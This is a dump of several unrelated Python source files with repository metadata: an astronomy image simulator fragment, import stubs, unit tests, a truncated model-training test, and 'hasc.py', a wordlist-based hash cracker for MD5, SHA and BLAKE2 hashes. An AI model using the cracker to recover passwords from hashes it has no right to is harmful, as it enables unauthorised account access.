y_r = x[i]*np.sin(RotAng) + y[j]*np.cos(RotAng)
x_r = int(round(x_r+self.Center[0]))
y_r = int(round(y_r+self.Center[1]))
# Judge and Fill
if (x_r>=1) and (x_r<=Cols) and (y_r>=1) and (y_r<=Rows):
ImageMat[y_r-1][x_r-1] = Param_Flux.Calc_Tb(Area,Flag=1)
# Lobe2
Rot_Ang = self.Angle + CoreAng + np.pi
CenDiff = [self.MajAxis * np.cos(self.Angle),self.MajAxis * np.sin(self.Angle)]
self.Center[0] = CoreCen[0]+CenDiff[0]*np.cos(CoreAng + np.pi)-CenDiff[1]*np.sin(CoreAng + np.pi)
self.Center[1] = CoreCen[1]+CenDiff[0]*np.sin(CoreAng + np.pi)+CenDiff[1]*np.cos(CoreAng + np.pi)
if self.MajAxis > self.MinAxis:
AxisMax = self.MajAxis
C_core = np.sqrt(self.MajAxis**2 - self.MinAxis**2)
# Focus1
F1_core_x = C_core
F1_core_y = 0
# Focus2
F2_core_x = -C_core
F2_core_y = 0
else:
AxisMax = self.MinAxis
C_core = np.sqrt(self.MinAxis**2 - self.MajAxis**2)
# Focus1
F1_core_x = 0
F1_core_y = C_core
# Focus2
F2_core_x = 0
F2_core_y = -C_core
a = int(np.round(self.MajAxis))
b = int(np.round(self.MinAxis))
x = np.arange(-a,a+1,1)
y = np.arange(-b,b+1,1)
# Ellipse
for i in range(len(x)):
for j in range(len(y)):
DistFocus1 = np.sqrt((x[i]-F1_core_x)**2+(y[j]-F1_core_y)**2)
DistFocus2 = np.sqrt((x[i]-F2_core_x)**2+(y[j]-F2_core_y)**2)
if (DistFocus1+DistFocus2<=2*AxisMax):
x_r = x[i]*np.cos(RotAng) - y[j]*np.sin(RotAng)
y_r = x[i]*np.sin(RotAng) + y[j]*np.cos(RotAng)
x_r = int(round(x_r+self.Center[0]))
y_r = int(round(y_r+self.Center[1]))
# Judge and Fill
if (x_r>=1) and (x_r<=Cols) and (y_r>=1) and (y_r<=Rows):
ImageMat[y_r-1][x_r-1] = Param_Flux.Calc_Tb(Area,Flag=1)
return ImageMat
class Flux:
def __init__(self,Freq = 150,ClassType=1):
self.I_151 = 10**(np.random.uniform(-4,-3))
self.Freq = Freq
self.ClassType = ClassType
def genSpec(self):
# generate the spectrum
# Use IF-THEN to replace SWITCH-CASE
if self.ClassType == 1:
Spec_lobe = (self.Freq/151e6)**-0.75*self.I_151
a0 = np.log10(self.I_151)-0.7*np.log10(151e6)+0.29*np.log10(151e6)*np.log10(151e6)
lgs = a0+0.7*np.log10(self.Freq)-0.29*np.log10(self.Freq)*np.log10(self.Freq)
Spec_core = 10**lgs
Spec = np.array([Spec_core,Spec_lobe])
elif self.ClassType == 2:
Spec_lobe = (self.Freq/151e6)**-0.75*self.I_151
Spec_hotspot = (self.Freq/151e6)**-0.75*self.I_151
a0 = np.log10(self.I_151)-0.7*np.log10(151e6)+0.29*np.log10(151e6)*np.log10(151e6)
lgs = a0+0.7*np.log10(self.Freq)-0.29*np.log10(self.Freq)*np.log10(self.Freq)
Spec_core = 10**lgs
Spec = np.array([Spec_core,Spec_lobe,Spec_hotspot])
return Spec
# Calc_Tb
def Calc_Tb(self,Area,Flag=0):
c = 2.99792458e8
kb = 1.38e-23
flux_in_Jy = self.genSpec()[Flag]
Omegab = Area/(3600*180/np.pi)/(3600*180/np.pi)
Sb = flux_in_Jy * 1e-26 /Omegab
FluxPixel = Sb/2/self.Freq/self.Freq*c*c/kb
return FluxPixel
def SimpleSim(Rows=512,Cols=512):
# Init
Param_core = Elp()
Param_lobe = Elp()
Param_Flux = Flux()
ImageMat = np.zeros((Rows,Cols))
# Caution: pay attention to the index
# Core parameters
Param_core.Center[0] = np.random.uniform(1,Cols)
Param_core.Center[1] = np.random.uniform(1,Rows)
Param_core.MajAxis = np.random.uniform(0,1)
Param_core.MinAxis = np.random.uniform(0,1)
Param_core.Angle = np.random.uniform(-np.pi,np.pi)
# Love parameters
Param_lobe.MajAxis = np.random.uniform(0,10)
Param_lobe.MinAxis = np.random.uniform(0,4)
Param_lobe.Angle = np.random.uniform(-np.pi,np.pi)
# Embed into the image mat
ImgLobe = Param_lobe.genLobes(ImageMat,Param_Flux,CoreAng=Param_core.Angle, CoreCen=Param_core.Center)
ImgCore = Param_core.genCore(ImageMat,Param_Flux)
ImageMat = ImgLobe+ImgCore
# Display
#Idx = np.argwhere(ImageMat>0)
#ImageMat[Idx[:,0],Idx[:,1]] = 100
ImgTest = Image.fromarray(ImageMat)
ImgTest.show()
def GenMultiFRs(Rows=512,Cols=512,Freq=150,NumFR=100):
# Generate multiple simulated FRs
# Init
Param_core = Elp()
Param_lobe = Elp()
Param_Flux = Flux()
Param_Flux.Freq = Freq
ImageMat = np.zeros((Rows,Cols))
for x in range(NumFR):
print 'FR %d' % x
# Core parameters
Param_core.Center[0] = np.random.uniform(1,Cols)
Param_core.Center[1] = np.random.uniform(1,Rows)
Param_core.MajAxis = np.random.uniform(0,1)
Param_core.MinAxis = np.random.uniform(0,1)
Param_core.Angle = np.random.uniform(-np.pi,np.pi)
# Lobe parameters
Param_lobe.MajAxis = np.random.uniform(0,5)
Param_lobe.MinAxis = np.random.uniform(0,2)
Param_lobe.Angle = np.random.uniform(-np.pi,np.pi)
# Embed into the image mat
ImgLobe = Param_lobe.genLobes(ImageMat,Param_Flux,CoreAng=Param_core.Angle, CoreCen=Param_core.Center)
ImgCore = Param_core.genCore(ImageMat,Param_Flux)
ImageMat = ImgLobe+ImgCore
# Display
Idx = np.argwhere(ImageMat>0)
ImageMat[Idx[:,0],Idx[:,1]] = 100
ImgTest = Image.fromarray(ImageMat)
ImgTest = ImgTest.convert('RGB')
FileName = 'Img_'+str(Freq)+'.jpg'
ImgTest.save(FileName)
ImgTest.show()
| 36.102941
| 110
| 0.552546
| 1,459
| 9,820
| 3.579164
| 0.114462
| 0.048449
| 0.048832
| 0.024512
| 0.764267
| 0.735159
| 0.728074
| 0.715818
| 0.699732
| 0.699732
| 0
| 0.055206
| 0.304582
| 9,820
| 271
| 111
| 36.236162
| 0.709474
| 0.068839
| 0
| 0.687831
| 0
| 0
| 0.004512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.021164
| null | null | 0.005291
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8559b515263f384e18aed6b99cfd9a3a5ca8c138
| 80
|
py
|
Python
|
notebooks/figures/funnel/__init__.py
|
mgrover1/cesm2-marbl-book
|
670375dd5ed800afd4a86de9871a7d44c535a3f0
|
[
"Apache-2.0"
] | null | null | null |
notebooks/figures/funnel/__init__.py
|
mgrover1/cesm2-marbl-book
|
670375dd5ed800afd4a86de9871a7d44c535a3f0
|
[
"Apache-2.0"
] | 4
|
2021-06-10T15:22:33.000Z
|
2021-06-21T19:29:03.000Z
|
notebooks/figures/funnel/__init__.py
|
mgrover1/cesm2-marbl-book
|
670375dd5ed800afd4a86de9871a7d44c535a3f0
|
[
"Apache-2.0"
] | 1
|
2021-05-18T18:41:57.000Z
|
2021-05-18T18:41:57.000Z
|
from . core import Collection, register_derived_var, register_query_dependent_op
| 80
| 80
| 0.8875
| 11
| 80
| 6
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 80
| 1
| 80
| 80
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
857a6f4968e0416c3c09ee515c59ea01f0c88026
| 466
|
py
|
Python
|
amocrm_api_client/token_provider/core/__init__.py
|
iqtek/amocrm_api_client
|
910ea42482698f5eb47d6b6e12d52ec09af77a3e
|
[
"MIT"
] | null | null | null |
amocrm_api_client/token_provider/core/__init__.py
|
iqtek/amocrm_api_client
|
910ea42482698f5eb47d6b6e12d52ec09af77a3e
|
[
"MIT"
] | null | null | null |
amocrm_api_client/token_provider/core/__init__.py
|
iqtek/amocrm_api_client
|
910ea42482698f5eb47d6b6e12d52ec09af77a3e
|
[
"MIT"
] | null | null | null |
from .exceptions import AuthorizationCodeExpiredException
from .exceptions import InvalidAuthorizationDataException
from .exceptions import RefreshTokenExpiredException
from .ICheckAccessTokenFunction import ICheckAccessTokenFunction
from .IGetTokensByAuthCodeFunction import IGetTokensByAuthCodeFunction
from .IGetTokensByRefreshTokenFunction import IGetTokensByRefreshTokenFunction
from .ITokenProvider import ITokenProvider
from .TokensBundle import TokensBundle
| 51.777778
| 78
| 0.914163
| 32
| 466
| 13.3125
| 0.34375
| 0.098592
| 0.140845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06867
| 466
| 8
| 79
| 58.25
| 0.981567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
857efbac00175a7f1b9b930c7299df4e8766bb62
| 55
|
py
|
Python
|
vnpy/api/bitmex/__init__.py
|
black0144/vnpy
|
0d0ea30dad14a0150f7500ff9a62528030321426
|
[
"MIT"
] | 34
|
2018-07-13T11:30:46.000Z
|
2022-01-05T13:48:10.000Z
|
vnpy/api/bitmex/__init__.py
|
black0144/vnpy
|
0d0ea30dad14a0150f7500ff9a62528030321426
|
[
"MIT"
] | null | null | null |
vnpy/api/bitmex/__init__.py
|
black0144/vnpy
|
0d0ea30dad14a0150f7500ff9a62528030321426
|
[
"MIT"
] | 22
|
2018-07-13T11:30:48.000Z
|
2021-09-25T13:30:08.000Z
|
from .vnbitmex import BitmexRestApi, BitmexWebsocketApi
| 55
| 55
| 0.890909
| 5
| 55
| 9.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 55
| 1
| 55
| 55
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8580a2d2fe660c074062f1272c3e1759782a3e9b
| 4,444
|
py
|
Python
|
hasc.py
|
teamx4ck/Hasc
|
b4e983ca678b5680b2a3c398fd9dc1da12f95ab6
|
[
"BSL-1.0"
] | 1
|
2021-05-10T06:27:16.000Z
|
2021-05-10T06:27:16.000Z
|
hasc.py
|
teamx4ck/Hasc
|
b4e983ca678b5680b2a3c398fd9dc1da12f95ab6
|
[
"BSL-1.0"
] | 1
|
2021-05-13T04:19:24.000Z
|
2021-05-29T16:46:58.000Z
|
hasc.py
|
teamx4ck/Hasc
|
b4e983ca678b5680b2a3c398fd9dc1da12f95ab6
|
[
"BSL-1.0"
] | null | null | null |
from os import system as sy
from time import sleep as slp
import sys
import hashlib
import itertools
import threading
sy('clear')
red='\u001b[31m'
grn='\u001b[32m'
cyn='\u001b[36m'
re='\u001b[0m'
ban=cyn+'''
/$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$
| $$ | $$ /$$__ $$ /$$__ $$ /$$__ $$
| $$ | $$| $$ \ $$| $$ \__/| $$ \__/
| $$$$$$$$| $$$$$$$$| $$$$$$ | $$
| $$__ $$| $$__ $$ \____ $$| $$
| $$ | $$| $$ | $$ /$$ \ $$| $$ $$
| $$ | $$| $$ | $$| $$$$$$/| $$$$$$/
|__/ |__/|__/ |__/ \______/ \______/
'''+re
print(ban)
def md5(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.md5(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def sha256(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.sha256(rf).hexdigest()
print(rehash)
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def sha512(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.sha512(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def sha3_256(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.sha3_256(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def sha3_512(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.sha3_512(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def blake2b(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.blake2b(rf).hexdigest()
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def blake2s(wd,hah):
try:
open(wd,'r')
except:
print(red+'Wordlist Not found!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
f=open(wd,'r')
while True:
rt=f.readline()
rf=rt.replace('\n','').encode()
rehash=hashlib.blake2s(rf).hexdigest(); print(rehash)
if hah==rehash:
done = True
print(grn+'Hash Found : '+rf.decode()); break
else:
pass
if len(rf)==0:
print(red+'Hash not in wordlist..'+re); break
def opt(n,nm):
print(cyn+'['+n+'] '+grn+nm+re)
opt('1','MD5')
opt('2','SHA-256')
opt('3','SHA-512')
opt('4','SHA-3-256')
opt('5','SHA-3-512')
opt('6','BLAKE2c')
opt('7','BLAKE2b')
opt('00','Exit')
opt = input(red+'\n[>] '+cyn+'Enter your option : '+re)
if opt=='1' or opt=='2' or opt=='3' or opt=='4' or opt=='5' or opt=='6' or opt=='7':
pass
elif opt=='0' or opt=='00':
slp(1)
print(red+'Bye'+re)
sys.exit()
else:
print(red+'Option Not found!!'+re)
slp(2)
sy('clear')
sy('python hasc.py')
hash=input(red+'[>] '+cyn+'Enter HASH : '+re)
wordlist=input(red+'[>] '+cyn+'Enter Wordlist path : '+re)
if opt=='1':
md5(wordlist,hash)
elif opt=='2':
sha256(wordlist,hash)
elif opt=='3':
sha512(wordlist,hash)
elif opt=='4':
sha3_256(wordlist,hash)
elif opt=='5':
sha3_512(wordlist,hash)
elif opt=='6':
blake2s(wordlist,hash)
elif opt=='7':
blake2b(wordlist,hash)
else:
print(red+'Not Found!!!')
| 21.263158
| 84
| 0.573582
| 687
| 4,444
| 3.646288
| 0.128093
| 0.054291
| 0.039122
| 0.041517
| 0.705389
| 0.705389
| 0.705389
| 0.705389
| 0.705389
| 0.705389
| 0
| 0.035284
| 0.177318
| 4,444
| 208
| 85
| 21.365385
| 0.649891
| 0
| 0
| 0.655172
| 0
| 0
| 0.251125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039409
| false
| 0.039409
| 0.029557
| 0
| 0.068966
| 0.137931
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
85a3c5caee8c0d52f5487970b3da7f636cbd112e
| 627
|
py
|
Python
|
src/tests/metrics/test_accuracy.py
|
lab-a1/pyai
|
0d05324fdf0ac07117eb5f4fde6b90d6cec10479
|
[
"WTFPL"
] | null | null | null |
src/tests/metrics/test_accuracy.py
|
lab-a1/pyai
|
0d05324fdf0ac07117eb5f4fde6b90d6cec10479
|
[
"WTFPL"
] | null | null | null |
src/tests/metrics/test_accuracy.py
|
lab-a1/pyai
|
0d05324fdf0ac07117eb5f4fde6b90d6cec10479
|
[
"WTFPL"
] | null | null | null |
from pyai import metrics
import numpy as np
def test_accuracy_1():
y_true = np.array([1, 1, 0, 1, 0, 0])
y_hat = np.array([1, 1, 0, 0, 0, 0])
accuracy = metrics.accuracy(y_true, y_hat)
assert round(accuracy, 3) == 0.833
def test_accuracy_2():
y_true = np.array([1, 1, 0, 1, 0, 0])
y_hat = np.array([1, 1, 1, 0, 0, 0])
accuracy = metrics.accuracy(y_true, y_hat)
assert round(accuracy, 3) == 0.667
def test_accuracy_3():
y_true = np.array([1, 1, 0, 1, 0, 0])
y_hat = np.array([0, 0, 0, 0, 0, 0])
accuracy = metrics.accuracy(y_true, y_hat)
assert round(accuracy, 3) == 0.5
| 23.222222
| 46
| 0.594896
| 119
| 627
| 2.983193
| 0.193277
| 0.073239
| 0.059155
| 0.126761
| 0.743662
| 0.735211
| 0.735211
| 0.735211
| 0.735211
| 0.735211
| 0
| 0.108108
| 0.232855
| 627
| 26
| 47
| 24.115385
| 0.629938
| 0
| 0
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.176471
| false
| 0
| 0.117647
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
85b12f48e402383950ddc618eb498b50ebc174c0
| 97
|
py
|
Python
|
contests_yukicoder/283/283_e.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | null | null | null |
contests_yukicoder/283/283_e.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | 1
|
2021-01-02T06:36:51.000Z
|
2021-01-02T06:36:51.000Z
|
contests_yukicoder/283/283_e.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | null | null | null |
n = int(input())
ans = [2 * 10 ** 9, 10 ** 9] + list(range(2, n + 1)) + [2 * 10 ** 9]
print(*ans)
| 32.333333
| 68
| 0.443299
| 19
| 97
| 2.263158
| 0.578947
| 0.209302
| 0.186047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.178082
| 0.247423
| 97
| 3
| 69
| 32.333333
| 0.410959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
85bf3a8a74b1f81b30be9b7a43d2c08c9d253ce3
| 16,736
|
py
|
Python
|
tests/test_training.py
|
ruflab/soc
|
b8508c92a8a27331292c8665cde01a9269b30897
|
[
"Apache-2.0"
] | null | null | null |
tests/test_training.py
|
ruflab/soc
|
b8508c92a8a27331292c8665cde01a9269b30897
|
[
"Apache-2.0"
] | null | null | null |
tests/test_training.py
|
ruflab/soc
|
b8508c92a8a27331292c8665cde01a9269b30897
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import shutil
import unittest
import pandas as pd
import torch
from unittest.mock import MagicMock
from pytorch_lightning import seed_everything, Trainer
from hydra.experimental import initialize, compose
from hydra.core.config_store import ConfigStore
from soc import models, datasets
from soc.training import SocConfig
from soc.datasets import make_dataset
from soc.runners import make_runner
cfd = os.path.dirname(os.path.realpath(__file__))
fixture_dir = os.path.join(cfd, 'fixtures')
_DATASET_PATH = os.path.join(fixture_dir, 'soc_seq_3_fullseq.pt')
_RAW_DATASET_PATH = os.path.join(fixture_dir, 'soc_seq_3_raw_df.pt')
_TEXT_BERT_DATASET_PATH = os.path.join(fixture_dir, 'soc_text_bert_3_fullseq.pt')
_RAW_TEXT_BERT_DATASET_PATH = os.path.join(fixture_dir, 'soc_text_bert_3_raw_df.pt')
class TestTraining(unittest.TestCase):
@classmethod
def setUpClass(cls):
cs = ConfigStore.instance()
cs.store(name="config", node=SocConfig)
cs.store(group="runner/model", name="convlstm", node=models.ConvLSTMConfig)
cs.store(group="runner/model", name="convlstmpolicy", node=models.ConvLSTMConfig)
cs.store(group="runner/model", name="conv3d", node=models.Conv3dModelConfig)
cs.store(group="runner/model", name="conv3dpolicy", node=models.Conv3dModelConfig)
cs.store(group="runner/model", name="resnet18", node=models.ResNetConfig)
cs.store(group="runner/model", name="resnet18policy", node=models.ResNetConfig)
cs.store(group="runner/model", name="resnet18fusionpolicy", node=models.ResNetFusionConfig)
cs.store(
group="runner/model", name="resnet18meanconcatpolicy", node=models.ResNetFusionConfig
)
cs.store(group="runner/model", name="resnet18meanffpolicy", node=models.ResNetFusionConfig)
cs.store(group="runner/dataset", name="psqlseqsatos", node=datasets.PSQLConfig)
cs.store(
group="runner/dataset",
name="preprocessedforwardsatosa",
node=datasets.PreprocessedForwardConfig
)
cs.store(
group="runner/dataset",
name="preprocessedforwardsatosapolicy",
node=datasets.PreprocessedForwardConfig
)
cs.store(
group="runner/dataset",
name="preprocessedseqsatosapolicy",
node=datasets.PreprocessedSeqConfig
)
cs.store(
group="runner/dataset",
name="psqltextbertforwardsatosapolicy",
node=datasets.PSQLTextForwardConfig
)
cs.store(
group="runner/dataset",
name="preprocessedtextbertforwardsatosapolicy",
node=datasets.PreprocessedTextForwardConfig
)
cs.store(
group="runner/dataset",
name="filetextbertforwardsatosapolicy",
node=datasets.FileTextForwardConfig
)
cs.store(
group="runner/dataset",
name="filetextberthumantradeforwardsatosapolicy",
node=datasets.FileTextForwardConfig
)
cls.data = torch.load(_RAW_DATASET_PATH)
cls.data_text_bert = torch.load(_RAW_TEXT_BERT_DATASET_PATH)
def _get_states_from_db_se_f(idx: int) -> pd.DataFrame:
return cls.data[idx][0]
def _get_actions_from_db_se_f(idx: int) -> pd.DataFrame:
return cls.data[idx][1]
def _get_length_se_f() -> int:
return len(cls.data)
def setup_dataset(self, hparams):
dataset = make_dataset(hparams.dataset)
dataset._get_states_from_db = MagicMock(side_effect=_get_states_from_db_se_f)
dataset._get_actions_from_db = MagicMock(side_effect=_get_actions_from_db_se_f)
dataset._get_length = MagicMock(side_effect=_get_length_se_f)
return dataset, None
cls.setup_dataset = setup_dataset
def _get_text_states_from_db_se_f(
table_id: int, start_row_id: int, end_row_id: int
) -> pd.DataFrame:
df = cls.data_text_bert[table_id][0]
return df[start_row_id:end_row_id]
def _get_text_actions_from_db_se_f(
table_id: int, start_row_id: int, end_row_id: int
) -> pd.DataFrame:
df = cls.data_text_bert[table_id][1]
df = df[(df['beforestate'] >= start_row_id + 1) & (df['beforestate'] < end_row_id + 1)]
if len(df) < (end_row_id - start_row_id):
# At the end of the trajectory, there is no action after the last state
# In this special case, we add it again
df = df.append(df.iloc[-1])
return df
def _get_text_chats_from_db_se_f(
table_id: int, start_row_id: int, end_row_id: int
) -> pd.DataFrame:
df = cls.data_text_bert[table_id][2]
df = df[(df['current_state'] >= start_row_id + 1)
& (df['current_state'] < end_row_id + 1)]
return df
def _get_text_nb_steps_se_f():
return [len(cls.data_text_bert[i][0]) for i in range(len(cls.data_text_bert))]
def _get_text_length_se_f() -> int:
return len(cls.data_text_bert)
def setup_text_dataset(self, hparams):
dataset = make_dataset(hparams.dataset)
dataset._get_states_from_db = MagicMock(side_effect=_get_text_states_from_db_se_f)
dataset._get_actions_from_db = MagicMock(side_effect=_get_text_actions_from_db_se_f)
dataset._get_chats_from_db = MagicMock(side_effect=_get_text_chats_from_db_se_f)
dataset._get_trajectories_length = MagicMock(side_effect=_get_text_nb_steps_se_f)
dataset._get_length = MagicMock(side_effect=_get_text_length_se_f)
return dataset, None
cls.setup_text_dataset = setup_text_dataset
def setUp(self):
self.folder = os.path.join(fixture_dir, str(int(time.time() * 100000000)))
def tearDown(self):
if os.path.isdir(self.folder):
shutil.rmtree(self.folder)
def test_training_soc_psql_seq_sas_convlstm(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=convlstm",
"runner/dataset=psqlseqsatos",
"runner.runner_name=SOCSupervisedSeqRunner"
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_dataset
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_psql_seq_sas_conv3d(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=conv3d",
"runner/dataset=psqlseqsatos",
"runner.runner_name=SOCSupervisedSeqRunner"
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_dataset
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_seq_conv3dpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=conv3dpolicy",
"runner/dataset=preprocessedseqsatosapolicy",
"runner.runner_name=SOCSeqPolicyRunner"
]
)
config.runner.dataset.dataset_path = _DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_seq_convlstmpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=convlstmpolicy",
"runner/dataset=preprocessedseqsatosapolicy",
"runner.runner_name=SOCSeqPolicyRunner"
]
)
config.runner.dataset.dataset_path = _DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_forward_resnet(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18",
"runner/dataset=preprocessedforwardsatosa",
"runner.runner_name=SOCSupervisedForwardRunner"
]
)
config.runner.dataset.dataset_path = _DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_preprocessed_forward_resnetpolicy(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18policy",
"runner/dataset=preprocessedforwardsatosapolicy",
"runner.runner_name=SOCForwardPolicyRunner"
]
)
config.runner.dataset.dataset_path = _DATASET_PATH
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
trainer = Trainer(**config['trainer'], deterministic=True)
trainer.fit(runner)
def test_training_soc_psql_forward_resnetfusionpolicy_self_attention(self):
with initialize(config_path=os.path.join(".", "fixtures", "conf")):
config = compose(
config_name="config",
overrides=[
"runner/model=resnet18fusionpolicy",
"runner/dataset=psqltextbertforwardsatosapolicy",
"runner.runner_name=SOCTextForwardPolicyRunner"
]
)
config.trainer.default_root_dir = self.folder
seed_everything(config['runner']['seed'])
runner = make_runner(config['runner'])
runner.setup_dataset = self.setup_text_dataset
runner.num_workers = 1
